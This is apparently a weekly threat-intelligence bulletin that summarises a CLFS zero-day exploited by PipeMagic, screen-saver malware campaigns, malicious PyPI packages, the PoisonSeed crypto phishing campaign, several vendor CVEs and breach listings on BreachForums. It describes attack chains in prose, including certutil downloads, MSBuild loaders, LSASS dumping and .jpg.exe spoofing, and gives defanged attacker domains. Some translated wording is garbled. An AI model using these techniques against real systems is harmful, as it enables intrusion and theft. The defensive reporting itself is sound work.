Introduction
The weekly Cybersecurity Bulletin report has been prepared by the ECHO team to summarize and inform about cybersecurity incidents that have occurred in recent weeks.
Executive Summary
This bulletin:
- Provides up-to-date information on cyber threats such as attacks, data leaks, malware, ransomware, and critical vulnerabilities.
- Our security team analyzes these threats and prepares a weekly bulletin to minimize potential risks.
- Security news
Malware of the Week: Exploiting Windows CLFS Zero-Day Vulnerability with PipeMagic Trojan
Description
Microsoft has patched CVE-2025-29824, a critical local privilege escalation vulnerability in the Windows Common Log File System (CLFS) component that is being actively exploited. This vulnerability was exploited by cyber threat actor Storm-2460 via a modular malware called PipeMagic to deliver ransomware on the system.
These attacks targeted the information technology and real estate sectors in the US, the financial sector in Venezuela, a software company in Spain, and the retail sector in Saudi Arabia.
Detected CVE
- CVE ID: CVE-2025-29824
- Vulnerability Type: Local Privilege Escalation
- Location of Vulnerability:
clfs.sys(CLFS kernel driver) - Impact: Gaining SYSTEM privileges, installing malware, and encrypting ransomware
- CVSS Score: 7.8 (considered critical)
Technical Details
Attack Chain
- Initial Access
- Although not clearly known, malware is downloaded from a legitimate site using the
certutiltool.
- Malicious File
- Encrypted payload is placed inside a MSBuild script.
- PipeMagic Infection
MSBuild.exedecrypts the encrypted content and runs the modular trojan horse named PipeMagic in memory.
- CLFS Exploitation
- PipeMagic uses the
RtlSetAllBitsAPI to set the transaction token to0xFFFFFFFFand gains SYSTEM level privileges.
- LSASS Memory Dump
lsass.exememory is dumped and session and credentials are captured.
- Ransomware Stage
- Files are encrypted with random extensions. RansomEXX note is left on the system.
Impact of Vulnerability or Malware
- Executing commands with SYSTEM rights
- Stolen user information and session data
- Encryption with ransomware and demanding payment via TOR
- Service interruption, data loss and financial loss
Code & API Functions
RtlSetAllBitsNtQuerySystemInformation- Access via
SeDebugPrivilege - Loading payload via
MSBuild.exe - Downloading malicious files via
certutil.exe
Another Malware of the Week: Threat Actors Use Windows Screen Saver Files as Malware Delivery Vehicle
Description
In the latest wave of attacks by threat actors, threat actors are using the Windows .SCR screen saver file extension to deliver malware. In this campaign, actors posing as international transportation companies trick target users with phishing emails into running malicious payloads designed as screen savers.
Technical Details
- Email Theme: The international logistics company themed emails contain headings written in Chinese and containing shipping notifications.
- Malicious Payload: The ZIP file contains a malicious file with a .scr extension.
- Loader: ModiLoader – Delphi-based malware loader.
- Distributed Malware:
- Remcos
- Agent Tesla
- MassLogger
- AsyncRAT
- Formbook
Targeted Industries and Countries
- Industries: Automotive, publishing, electronics, aviation, manufacturing, cleaning products, entertainment industry
- Countries: Turkey, Japan, UK, Sweden, USA, Hong Kong, Taiwan, Thailand, Malaysia
Impact of Vulnerability or Malware
- When users run the screensaver file, the malware is activated in the background.
- Permanent access to corporate systems, data exfiltration and remote control are provided.
- Malicious files are usually hidden in email attachments as RAR/ZIP.
Detected Methods and Detection Codes
- Symantec detection names:
- Trojan.Gen.MBT
- Scr.Malcode!gen19
- Machine learning model:
- Heur.AdvML.B
- Email filtering & sandbox recommendation:
- Email Threat Isolation (ETI)
- VMware Carbon Black policies: Blocking against PUP and suspicious behavior
Malicious Python Library of the Week :Malicious Python Packages Detected on PyPI: Over 39,000Data Theft by Over-Downloading
Description
Malicious packages designed to steal users’ database files, credit card information, and other sensitive data have been detected via the Python Package Index (PyPI). These packages include fake “bitcoinlib” fixes and tools that perform card verification on WooCommerce. With over 39,000 downloads in total, they pose a serious threat.
Malicious Packages Detected
| Package Name | Download Count | Malicious Purpose |
|---|---|---|
| bitcoinlibdbfix | 1,101 | Data export by modifying CLW CLI command |
| bitcoinlib-dev | 735 | Fake fix package, data leak |
| disgrasya | 37,217 | Card verification and information leak on WooCommerce |
Technical Details
bitcoinlibdbfix and bitcoinlib-dev
- Presented as fake fixes to the real
bitcoinlibmodule. - Stolen database files from user systems by overwriting the
clwcommand. - Developers participated in discussions on GitHub and promoted these packages as a legitimate fix.
disgrasya
- Targets WooCommerce stores and systems using the CyberSource payment gateway.
- The script automatically performs the following actions:
- Search for a product
- Add to cart
- Enter stolen card information in the checkout form
- Performs card verification by mimicking real user behavior.
- Stolen card information is sent to the
railgunmisaka[.]comserver.
Impact
- Database information leak: Passwords, configurations, custom files.
- Credit card information verification: Testing the validity of cards and making them sellable.
- Integration with automation systems: Facilitating wider attacks.
Campaign of the Week: PoisonSeed Campaign: Crypto Wallet Poisoning Attacks via CRM Accounts
Description
The malicious campaign called “PoisonSeed” uses compromised CRM and bulk email service provider accounts to perform crypto wallet “seed phrase poisoning” attacks. The goal is to trick victims into losing funds in wallets they created using fake recovery phrases (seed phrases) to the attackers.
Targeted Platforms
- CRM and email services: Mailchimp, SendGrid, Hubspot, Mailgun, Zoho
- Crypto platforms: Coinbase, Ledger
- Target audience: Enterprise companies and individual users
Technical Details
1. Phishing Pages
- Attackers create fake login screens for CRM providers.
- After the credentials are compromised, an API key is created to ensure permanence.
2. Spreading via Spam
- Email lists are exported from compromised accounts using automated tools.
- Victims are advised to set up Coinbase Wallet and use the specified seed phrase.
- The seed phrase is redirected to wallets controlled by the attackers.
3. Domains and Infrastructures Used
- Example fake domain name:
mailchimp-sso[.]com - Fake pages hosted on Cloudflare Pages.Dev & Workers.Dev
- Double extension
.LNKfiles over thems-searchprotocol - Remote control using the Pyramid C2 framework
- Victim IP information is transmitted to the attacker via the Telegram bot
Impact
- Financial Losses: Assets in crypto wallets are stolen.
- Persistent Access: Access can be protected with an API key.
- Reputation Damage: CRM services can become a source of spam.
Featured Vulnerabilities of the Week
Critical Unauthorized Password Change Vulnerability in FortiSwitch Products (CVE-2024-48887)
Description
Fortinet has released security updates for a critical vulnerability discovered in FortiSwitch products that could allow remote unauthenticated attackers to change administrator passwords.
Detected CVE
- CVE ID: CVE-2024-48887
- Risk Score: 9.3 (out of 10)
- Description: FortiSwitch GUI unauthenticated password change vulnerability (CWE-620)
- Impact: Remote unauthenticated attackers can change administrator passwords via a specially crafted request.
Technical Detail
This vulnerability in the FortiSwitch web-based management interface (GUI) allows unauthenticated attackers to change administrator passwords via specially crafted HTTP requests. This makes the system vulnerable to unauthorized access.
Sample Request:
Impact of Vulnerability
If this vulnerability is successfully exploited, attackers can change the passwords of administrator accounts and gain full control over the systemler. This leads to a serious compromise of network security.
Codes / Functions of the Vulnerability
- Fortinet has not shared detailed information about the specific codes and functions of the vulnerability.
- It is evaluated in the CWE-620 (Unverified Password Change) class.
- The vulnerability was discovered by Daniel Rozeboom from the FortiSwitch web UI development team.
Microsoft Fixes 125 Vulnerabilities, Including Actively Exploited Zero-Day Vulnerability in Windows CLFS Component
Description
Microsoft released updates that fix a total of 125 security vulnerabilities** in the Windows operating system as part of the April 2025 “Patch Tuesday”. These patches include CVE-2025-29824, a zero-day vulnerability that is currently actively exploited by attackers. The vulnerability is located in the Common Log File System (CLFS) component of Windows and can lead to SYSTEM level privilege gain.
Critical CVE Identified
- CVE ID: CVE-2025-29824
- Vulnerability Type: Use-After-Free
- Affected Component: Windows CLFS
- Privilege Level: Transition from low-privileged user to SYSTEM privileges
- CVSS Score: 7.8 / 10
- Exploitation Status: Actively used in the field
- Attributed Threat Actor: Storm-2460
- Associated Malware: PipeMagic loader (associated with ransomware campaigns)
Technical Details
The vulnerability is caused by a use-after-free memory management error that allows a local low-privileged user to gain SYSTEM privileges by executing a specially crafted exploit. This vulnerability, which does not require user interaction, is being used by ransomware actors in targeted attacks.
Microsoft stated that it plans to develop HMAC (Hash-based Message Authentication Code) integration and new mitigation mechanisms in the future against such issues in the CLFS component.
Impact of the Vulnerability
- User privileges can be increased and control can be provided at the SYSTEM level.
- Ransomware and other malware can be loaded into the system.
- Critical system components are targeted, making data leakage, damage or intra-network spread possible.
- The vulnerability has been reported to affect sectors (IT, software, real estate, retail) in Venezuela, Spain, the USA and Saudi Arabia.
Extra Critical Patches
- Another Use-After-Free vulnerability (Remote Code Execution) in the Hyper-V component
- RCE vulnerabilities for Windows RDP (Remote Desktop Services)
- Remotely exploitable RCE vulnerabilities in Microsoft Office and Excel
CVE-2025-30401 – Critical Spoofing Vulnerability in WhatsApp for Windows Application Possible Code Execution
Description
This vulnerability, identified as CVE-2025-30401, is caused by an inconsistency between the MIME type and file extension in the Windows version of WhatsApp, which can allow users to unknowingly run malicious software (e.g. trojan, ransomware, spyware) by opening seemingly harmless attachments.
Detected CVE
- CVE ID: CVE-2025-30401
- Vulnerability Type: Spoofing
- Impact: Remote Code Execution
- Affected Versions: 0.0.0 – 2.2450.5
- Secure Version: 2.2450.6 and above
- Danger Level: Critical
- Vulnerability Description: Due to the incompatibility between the MIME type and the file extension, malicious files with binary extensions such as
.jpg.exeare detected as “images” but execute code when executed.
Technical Details
Configuration Example
- MIME Type:
image/jpeg - File Extension:
file.jpg.exe - User Perception: Visual content (.jpg)
- Actual Behavior: Executable file runs
Windows acts only according to the file extension, without considering the MIME type of the file. Therefore, files like
.jpg.exeare shown as harmless but execute malicious code when run.
Impact of Vulnerability
- Code Execution: Malware, RATs, and ransomware can be launched automatically.
- Social Engineering Attacks: Users are tricked through a chat platform they trust.
- Large-Scale Impact: Businesses, public institutions, and individual users can be targeted.
Codes / Functions of the Vulnerability
- MIME and Extension Incompatibility: MIME:
image/jpeg, Extension:.jpg.exe - File Triggering Mechanism:
- WhatsApp displays the file according to the MIME type
- Windows runs it according to the file extension
11 Critical Vulnerabilities in Adobe ColdFusion Products
Description
Adobe has released security updates to address a total of 30 security vulnerabilities in its various products, including ColdFusion versions 2025, 2023 and 2021. 11 of these vulnerabilities are critical and can cause serious effects on the system, such as unauthorized file reading, remote code execution (RCE) and security feature bypassr.
Detected CVEs (Critical)
- CVE-2025-24446 – Arbitrary read on file system (CVSS: 9.1)
- CVE-2025-24447 – RCE via insecure data serialization (CVSS: 9.1)
- CVE-2025-30281 – Insufficient access control (CVSS: 9.1)
- CVE-2025-30282 – RCE via insufficient validation mechanism (CVSS: 9.1)
- CVE-2025-30284/85 – Serialization vulnerabilities (CVSS: 8.0)
- CVE-2025-30286/89 – Remote command injection execution (CVSS: 8.0 – 7.5)
- CVE-2025-30287 – RCE with unauthorized validation (CVSS: 8.1)
- CVE-2025-30288 – Security feature bypass (CVSS: 7.8)
- CVE-2025-30290 – Bypass of system protection mechanisms with path traversal (CVSS: 8.7)
Technical Details
- Types of Vulnerabilities: Serialization, lack of access control, command injection, authentication deficiencies
- Potential Exploitation: Attackers can create malicious objects on the target system, particularly by exploiting serialization vulnerabilities. These objects can gain unauthorized access to the file system or cause arbitrary commands to be executed.
Impact of Vulnerabilities
- File System Violations: Unauthorized access to critical system files can be gained.
- Remote Code Execution (RCE): Malicious commands can be injected into the system.
- Security Feature Bypass: System protection can be bypassed by disabling authentication mechanisms.
Related Code / Modules
- Serialization functions:
readObject,ObjectInputStream - Command Injection Entry Points: Direct execution of user input with commands such as
Runtime.exec - Authentication Bypass Points: Insufficiently validated REST API ends, admin interfaces
Critical CVE Detail Examples
CVE-2025-24446
- CVSS Score: 9.1
- Description: This vulnerability, caused by improper input validation, allows attackers to read arbitrary files.
- Impact: Unauthorized access to the file system may be possible.
CVE-2025-24447
- CVSS Score: 9.1
- Description: A serialization vulnerability in untrusted data allows attackers to execute arbitrary code.
- Impact: Unauthorized commands may be executed on the system.
CVE-2025-30281
- CVSS Score: 9.1
- Description: Unauthorized access to the file system may be gained through access control deficiencies.
- Impact: Unauthorized data viewing and exfiltration.
CVE-2025-30282
- CVSS Score: 9.1
- Description: A vulnerability in the authentication mechanism allows attackers to perform RCE.
- Impact: Control of the system may be taken.
What’s Happening in the Hacker Forum World
hibu.com DATA BREACH – Database, Leaked!
- Date: April 10, 2025
- Threat Actor: Meow
- Forum: BreachForums
- Share:
In March 2025, it was announced that there was a major data breach against the hibu.com platform, which offers digital marketing and local business solutions. It is stated that in this breach, data belonging to approximately 68,000 companies was leaked and shared by the attackers.
Breach Details:
- Data Types: Full Name, Email Address, Phone Number, Commenter Information
- Total Number of Registrations: 68,000 companies
- Publication Format: Offered as secret content for “8 credits” via BreachForums.
- Payment Methods: Credit system (no details provided)
According to the attacker’s sharing, the leaked data includes users’ personal and corporate contact information, and this data can be misused for various purposes. It is strongly recommended that users and companies check whether they are affected by this data leak and take basic security measures such as changing their passwords.
##Zain Telecom DATA BREACH – Database, Leaked!
- Date: June 16, 2023
- Threat Actor: FazyMalone
- Forum: BreachForums
- Share:
Zain Telecom, one of Iraq’s leading telecommunications companies, came to the fore with a large-scale data breach that was reported to have occurred between 2019 and 2021. The breach revealed that over 11 million user records were leaked and that this data was openly shared.
Breach Details:
- Data Types: Full Name, City, Address, Phone Number, ID Number
- Years: 2019 – 2021
- Total Number of Records: Over 11 million
- Sample Data: The forum post includes sample records containing ID number, phone, full address and personal information.
Sharing the data directly and presenting the examples openly on the forum increases the seriousness of the incidentThis situation may pose serious privacy and security threats to individuals and institutions in Iraq. Users are advised to increase their awareness of risks such as identity theft and fraud and re-evaluate their security measures.
CNSS (National Social Security Fund of Morocco) DATA BREACH – FULL DATABASE LEAKED 2025
- Date: April 8, 2025
- Threat Actor: Jabaroot
- Forum: BreachForums
- Share:
The CNSS, the public social security institution of Morocco (Caisse Nationale de Sécurité Sociale) faced a major data breach in April 2025. The institution was founded in 1959 and was transferred from the Ministry of Labor to the Ministry of Finance in 2021. The CNSS carries out the social security processes of more than 400,000 companies and approximately 3.9 million employees.
Violation Details:
- Data Types:
- 499,881 registered company information (CSV files) containing company data
- 53,574 PDF files with salary information of company employees
- 1,996,026 employee personal data (in detailed CSV format)
Company Data Fields (CSV): companyName, affiliateNumber, admin_email, admin_phoneNumber, bank_accountId, bank_accountRIB, bank_adherent_raisonSocial, bank_accountState, bank_accountDefaultState, bank_dateCreation, etc.
Employee Data Fields (CSV): ID_adherent, firstName, lastName, immatriculationNumber, cin, passportNumber, residenceNumber, creationDate, affiliateName, affiliateNumber, demandState, etc.
This leak clearly reveals the financial and personal information of not only individuals but also corporate structures. It also brings risks such as data breach, identity theft, fraud and social engineering attacks. It is strongly recommended that individuals and institutions registered in the CNSS system perform the necessary security checks.
